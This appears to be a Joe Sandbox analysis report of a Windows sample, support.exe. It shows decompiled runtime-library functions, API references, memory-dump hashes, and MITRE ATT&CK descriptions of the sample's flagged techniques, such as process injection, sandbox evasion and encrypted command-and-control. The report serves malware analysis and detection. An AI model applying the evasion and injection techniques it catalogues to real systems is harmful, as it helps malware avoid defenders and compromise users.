				if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x1c)))) != __ecx + 0x3c || _a16 != 1 ||  *((intOrPtr*)(__ecx + 0x38)) != 0) {
					_t40 = _a12;
					_t53 = _a8;
				} else {
					_t40 = _a12;
					_t53 = _a8 + 0xffffffff;
					asm("adc eax, 0xffffffff");
				}
				_v24 = _t40;
				if( *(_t73 + 0x4c) == 0 || E003BE0E0(_t73, _t70, _t73) == 0) {
					L14:
					asm("xorps xmm0, xmm0");
					 *_t70 = 0xffffffff;
					 *((intOrPtr*)(_t70 + 4)) = 0xffffffff;
					 *((intOrPtr*)(_t70 + 8)) = 0;
					 *((intOrPtr*)(_t70 + 0xc)) = 0;
					asm("movq [edi+0x10], xmm0");
				} else {
					_t61 = _v24;
					_t46 = _a16;
					if((_t53 | _t61) != 0 || _t46 != 1) {
						__imp___fseeki64( *(_t73 + 0x4c), _t53, _t61, _t46);
						_t78 = _t78 + 0x10;
						if(_t46 != 0) {
							goto L14;
						} else {
							goto L10;
						}
					} else {
						L10:
						_t48 = fgetpos( *(_t73 + 0x4c),  &_v20);
						_t78 = _t78 + 8;
						if(_t48 != 0) {
							goto L14;
						} else {
							_t49 =  *((intOrPtr*)(_t73 + 0xc));
							if( *_t49 == _t73 + 0x3c) {
								_t65 =  *((intOrPtr*)(_t73 + 0x50));
								 *_t49 = _t65;
								 *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x1c)))) = _t65;
								 *((intOrPtr*)( *((intOrPtr*)(_t73 + 0x2c)))) =  *((intOrPtr*)(_t73 + 0x54)) - _t65;
							}
							 *_t70 = _v20;
							 *((intOrPtr*)(_t70 + 4)) = _v16;
							 *((intOrPtr*)(_t70 + 8)) = 0;
							 *((intOrPtr*)(_t70 + 0xc)) = 0;
							 *((intOrPtr*)(_t70 + 0x10)) =  *((intOrPtr*)(_t73 + 0x40));
							 *((intOrPtr*)(_t70 + 0x14)) =  *((intOrPtr*)(_t73 + 0x44));
						}
					}
				}
				return E003BE3D0(_v8 ^ _t78);
			}

0x003bd5a6
0x003bd5a9
0x003bd5b0
0x003bd5b5
0x003bd5b6
0x003bd5b8
0x003bd5b9
0x003bd5c4
0x003bd5e0
0x003bd5e3
0x003bd5d2
0x003bd5d5
0x003bd5d8
0x003bd5db
0x003bd5db
0x003bd5ea
0x003bd5ee
0x003bd684
0x003bd684
0x003bd687
0x003bd68d
0x003bd694
0x003bd69b
0x003bd6a2
0x003bd603
0x003bd603
0x003bd60b
0x003bd60e
0x003bd61b
0x003bd621
0x003bd626
0x00000000
0x00000000
0x00000000
0x00000000
0x003bd628
0x003bd628
0x003bd630
0x003bd636
0x003bd63b
0x00000000
0x003bd63d
0x003bd63d
0x003bd645
0x003bd64a
0x003bd64f
0x003bd654
0x003bd659
0x003bd659
0x003bd665
0x003bd66b
0x003bd66e
0x003bd675
0x003bd67c
0x003bd67f
0x003bd67f
0x003bd63b
0x003bd60e
0x003bd6ba

APIs

_fseeki64.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?), ref: 003BD61B
fgetpos.API-MS-WIN-CRT-STDIO-L1-1-0(?,?), ref: 003BD630

Strings

[^K/, xrefs: 003BD5A9

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: _fseeki64fgetpos
String ID: [^K/
API String ID: 3401907645-4166871755
Opcode ID: 91bd8708bd63a72d2c69357e228e0d22179e458456e0b3c040fb9827f166baef
Instruction ID: 3ac24c7857f0e97e4413091190554becd031353f327ed4fbb851e42a2bc9f84c
Opcode Fuzzy Hash: 91bd8708bd63a72d2c69357e228e0d22179e458456e0b3c040fb9827f166baef
Instruction Fuzzy Hash: 32415D702007069FCB25CF18C840A66B7F5FF45328F518A2EE96587B90E371F814CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 003BE0E0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 75fileCOMMON

Download Yara Rule

APIs

?unshift@?$codecvt@DDU_Mbstatet@@@std@@QBEHAAU_Mbstatet@@PAD1AAPAD@Z.MSVCP140(?,?,003BD191,?,?,?,?,?,?,?,003BE1B3,00000000,?,003BD191,000000B0), ref: 003BE123
fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?,?,?,?,?,?,?,003BE1B3,00000000,?,003BD191,000000B0), ref: 003BE15F

Strings

[^K/, xrefs: 003BE0E6

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: ?unshift@?$codecvt@Mbstatet@@Mbstatet@@@std@@fwrite
String ID: [^K/
API String ID: 1347553915-4166871755
Opcode ID: 3020a59864b526638013d29e568b6e486eda862632059dcee70c1f1a5bcd4611
Instruction ID: 5bdb45138e0a955af2a855297a140f570e1b65ad3ad9556f4344b3caf36fb0a6
Opcode Fuzzy Hash: 3020a59864b526638013d29e568b6e486eda862632059dcee70c1f1a5bcd4611
Instruction Fuzzy Hash: F6212632500108ABCB22DFBCC949AEEB7E8EB45324F18065AD507D79C0DA70BA44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 003BE3D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 36%

			E003BE3D0(void* __ecx, int _a4) {
				signed int _v12;
				signed int _v16;
				void* _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				void* _t24;
				signed int _t28;
				char* _t31;
				void* _t49;
				void* _t50;
				void* _t56;
				void* _t57;

				asm("repne jnz 0x5");
				asm("repne ret");
				asm("repne jmp 0x7b8");
				_t49 = _t56;
				while(1) {
					_t24 = malloc(_a4); // executed
					if(_t24 != 0) {
						break;
					}
					_push(_a4);
					L003BF2E5();
					if(_t24 == 0) {
						if(_a4 != 0xffffffff) {
							_push(_t49);
							_t49 = _t56;
							_t56 = _t56 - 0xc;
							E003BECA7( &_v20);
							_push(0x3c3694);
							_push( &_v20);
							L003BF2CD();
							asm("int3");
						}
						_push(_t49);
						_t50 = _t56;
						_t57 = _t56 - 0xc;
						E003BECDA( &_v20);
						_push(0x3c36cc);
						_push( &_v20);
						L003BF2CD();
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(E003BEDCB);
						_push( *[fs:0x0]);
						_v20 = _t50;
						_t28 =  *0x3c500c; // 0x4b5ee95b
						_v12 = _v12 ^ _t28;
						_push(_t28 ^  &_v20);
						_v32 = _t57 - _v20;
						_push(_v16);
						_v12 = 0xfffffffe;
						_v16 = _v12;
						_t31 =  &_v24;
						 *[fs:0x0] = _t31;
						asm("repne ret");
						 *[fs:0x0] = _v24;
						_pop(_t41);
						_pop(_t52);
						asm("repne ret");
						_push(_v40);
						_push(_v44);
						_push(_v48);
						_push(_v52);
						_push(E003BE3D0);
						_push("[\xef\xbf\x						L003BF2D3();
						return _t31;
					} else {
						continue;
					}
					L12:
				}
				return _t24;
				goto L12;
			}

0x003be3d6
0x003be3d9
0x003be3db
0x003be3e2
0x003be3f3
0x003be3f6
0x003be3fe
0x00000000
0x00000000
0x003be3e6
0x003be3e9
0x003be3f1
0x003be406
0x003bed30
0x003bed31
0x003bed33
0x003bed39
0x003bed3e
0x003bed46
0x003bed47
0x003bed4c
0x003bed4c
0x003bed4d
0x003bed4e
0x003bed50
0x003bed56
0x003bed5b
0x003bed63
0x003bed64
0x003bed69
0x003bed6a
0x003bed6b
0x003bed6c
0x003bed6d
0x003bed6e
0x003bed6f
0x003bed70
0x003bed75
0x003bed80
0x003bed8d
0x003bed92
0x003bed97
0x003bed98
0x003bed9b
0x003beda1
0x003beda8
0x003bedab
0x003bedae
0x003bedb4
0x003bedb9
0x003bedc0
0x003bedc7
0x003bedc9
0x003bedce
0x003bedd1
0x003bedd4
0x003bedd7
0x003bedda
0x003beddf
0x003bede4
0x003beded
0x00000000
0x00000000
0x00000000
0x00000000
0x003be3f1
0x003be401
0x00000000

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 003BEB9E
___raise_securityfailure.LIBCMT ref: 003BEC85

Strings

[^K/, xrefs: 003BEC66

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: FeaturePresentProcessor___raise_securityfailure
String ID: [^K/
API String ID: 3761405300-4166871755
Opcode ID: 282c17fa257592ec336bc0b1cd40e17c72425f0e930ea42268769401b52f57e2
Instruction ID: 16438bf711c19cfb8843880c810156cb31254d462c7d0d467721dc36fdececd6
Opcode Fuzzy Hash: 282c17fa257592ec336bc0b1cd40e17c72425f0e930ea42268769401b52f57e2
Instruction Fuzzy Hash: AF2139B8505600DED701DF24FA46B657BF6BB48308F20606AF60ACB7B0DBB06880CF45

Uniqueness

Uniqueness Score: -1.00%

Function 003B5D50 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E003B5D50(intOrPtr* __ecx) {
				intOrPtr _v8;
				char _v16;
				signed int _t9;
				char* _t11;
				intOrPtr _t13;
				intOrPtr* _t16;
				intOrPtr* _t17;
				void* _t21;
				intOrPtr* _t22;
				signed int _t24;

				_t9 =  *0x3c500c; // 0x4b5ee95b
				_t11 =  &_v16;
				 *[fs:0x0] = _t11;
				_t22 = __ecx;
				__imp__?uncaught_exception@std@@YA_NXZ(_t9 ^ _t24, _t21,  *[fs:0x0], E003BF870, 0xffffffff);
				if(_t11 == 0) {
					__imp__?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ();
				}
				_v8 = 0;
				_t16 =  *_t22;
				_t13 =  *((intOrPtr*)( *_t16 + 4));
				_t17 =  *((intOrPtr*)(_t13 + _t16 + 0x38));
				if(_t17 != 0) {
					_t13 =  *((intOrPtr*)( *_t17 + 8))();
				}
				 *[fs:0x0] = _v16;
				return _t13;
			}

0x003b5d62
0x003b5d6a
0x003b5d6d
0x003b5d73
0x003b5d75
0x003b5d7d
0x003b5d81
0x003b5d81
0x003b5d87
0x003b5d8e
0x003b5d92
0x003b5d95
0x003b5d9b
0x003b5d9f
0x003b5d9f
0x003b5da5
0x003b5db1

APIs

?uncaught_exception@std@@YA_NXZ.MSVCP140(4B5EE95B,?,?,003BF870,000000FF), ref: 003B5D75
?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEXXZ.MSVCP140(?,?,003BF870,000000FF), ref: 003B5D81

Strings

[^K/, xrefs: 003B5D62

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: ?uncaught_exception@std@@D@std@@@std@@Osfx@?$basic_ostream@U?$char_traits@
String ID: [^K/
API String ID: 888405505-4166871755
Opcode ID: d89924f54400dc33478cb71072c4283b834cef9bca3bdad3e02dec90cacb048b
Instruction ID: 87c74509590e0443087ad8bbb54a5785efa27e2b9dbe88768e9ea23cf2fd0cd6
Opcode Fuzzy Hash: d89924f54400dc33478cb71072c4283b834cef9bca3bdad3e02dec90cacb048b
Instruction Fuzzy Hash: 5DF04935604604DFC715DF18D848FA5B7E8FB09714F1542AEE902C7BA1CB36AC00CB80

Uniqueness

Uniqueness Score: -1.00%

Function 003B5F70 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 32COMMON

Download Yara Rule

APIs

?_Xlength_error@std@@YAXPBD@Z.MSVCP140(vector<T> too long), ref: 003B5F75

Strings

[^K/, xrefs: 003B5F91
vector<T> too long, xrefs: 003B5F70

Memory Dump Source

Source File: 00000000.00000002.517793514.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true

Associated: 00000000.00000002.517759190.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517881948.00000000003C1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517890121.00000000003C5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517948063.00000000003C6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518495863.0000000000476000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518662878.0000000000530000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.518991585.00000000006F5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.519000461.00000000006F7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3b0000_support.jbxd

Yara matches

Similarity

API ID: Xlength_error@std@@
String ID: [^K/$vector<T> too long
API String ID: 1004598685-3014249308
Opcode ID: 44adf7f99d0f24b91ab3d347216e4854fe97f5b09797d6a41a9b3e6b32af686f
Instruction ID: a057d2762caa796ec4b7d2261ac357141af083f68f69693764c316d850e12dc3
Opcode Fuzzy Hash: 44adf7f99d0f24b91ab3d347216e4854fe97f5b09797d6a41a9b3e6b32af686f
Instruction Fuzzy Hash: 4BF05839644908DFC309CF58D880F95B7F8FB09B24F1142ADE90AC7BA1CB35A800CB40

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report support.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

\Device\ConDrv

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: support.exePID: 6060, Parent PID: 5964

General

Chronological Activities

Analysis Process: conhost.exePID: 2404, Parent PID: 6060

General

Chronological Activities

Windows Analysis Report
support.exe

Function 003B3B30 Relevance: 102.5, APIs: 41, Strings: 17, Instructions: 1028
sleepstringthreadCOMMONCrypto

Function 003B7C40 Relevance: 52.9, APIs: 18, Strings: 12, Instructions: 383
libraryloaderCOMMONCrypto

Function 003B3520 Relevance: 26.6, APIs: 13, Strings: 2, Instructions: 315
threadsleepCOMMONCrypto

Function 003B6560 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 64
sleepCOMMON

Function 003B6620 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38
sleepCOMMON

Function 003BF0FA Relevance: 1.5, APIs: 1, Instructions: 3
COMMON

Function 003B5420 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 187
COMMON

Function 003B61D0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167
COMMON

Function 003B5FD0 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 158
COMMON

Function 003B34A0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
COMMON

Function 003BE3E1 Relevance: 6.0, APIs: 4, Instructions: 44
COMMONLIBRARYCODE

Function 003BE7BD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
COMMON

Function 003B51D0 Relevance: 4.6, APIs: 3, Instructions: 130
COMMON

Function 003B5660 Relevance: 4.5, APIs: 3, Instructions: 19
COMMON

Function 003B31F0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 59
COMMON

Function 003B7610 Relevance: 56.3, APIs: 19, Strings: 13, Instructions: 347
sleeplibraryloaderCOMMONCrypto

Function 003BA100 Relevance: 49.4, APIs: 4, Strings: 23, Instructions: 2150
COMMONCrypto

Function 003B66C0 Relevance: 44.1, APIs: 18, Strings: 7, Instructions: 356
sleepinjectionCOMMON

Function 003BCA60 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 235
networkfileCOMMON

Function 003B6F80 Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 414
processsleepCOMMONCrypto

Function 003BCDA0 Relevance: 21.3, APIs: 8, Strings: 4, Instructions: 329
COMMONCrypto

Function 003B6D60 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 174
COMMONCrypto

Function 003B6C80 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81
processCOMMON

Function 003B29D0 Relevance: 9.2, Strings: 7, Instructions: 435
COMMONCrypto

Function 003BF154 Relevance: 6.0, APIs: 4, Instructions: 25
timethreadCOMMONLIBRARYCODE

Function 003B6450 Relevance: 1.5, APIs: 1, Instructions: 33
COMMON

Function 003B64B0 Relevance: .0, Instructions: 13
COMMON

Function 003B9D80 Relevance: 19.5, APIs: 8, Strings: 3, Instructions: 258
sleepCOMMON

Function 003B9940 Relevance: 17.8, APIs: 7, Strings: 3, Instructions: 276
COMMON

Function 003BD8E0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 205
COMMON

Function 003BE210 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 89
COMMON

Function 003B3300 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126
COMMON

Function 003BE5BE Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 65
COMMONLIBRARYCODE

Function 003BC730 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 160
COMMON

Function 003B5DD0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 158
COMMON

Function 003B8EE0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 154
COMMON

Function 003BDC30 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 137
COMMON

Function 003B5AF0 Relevance: 7.6, APIs: 5, Instructions: 140
COMMON

Function 003B8460 Relevance: 7.6, APIs: 5, Instructions: 97
synchronizationCOMMON

Function 003BD3D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 82
COMMON

Function 003B64D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 41
libraryloaderCOMMON

Function 003B3A00 Relevance: 6.1, APIs: 4, Instructions: 96
sleepCOMMON

Function 003B5830 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124
COMMON

Function 003B56B0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124
COMMON

Function 003B8160 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 113
COMMON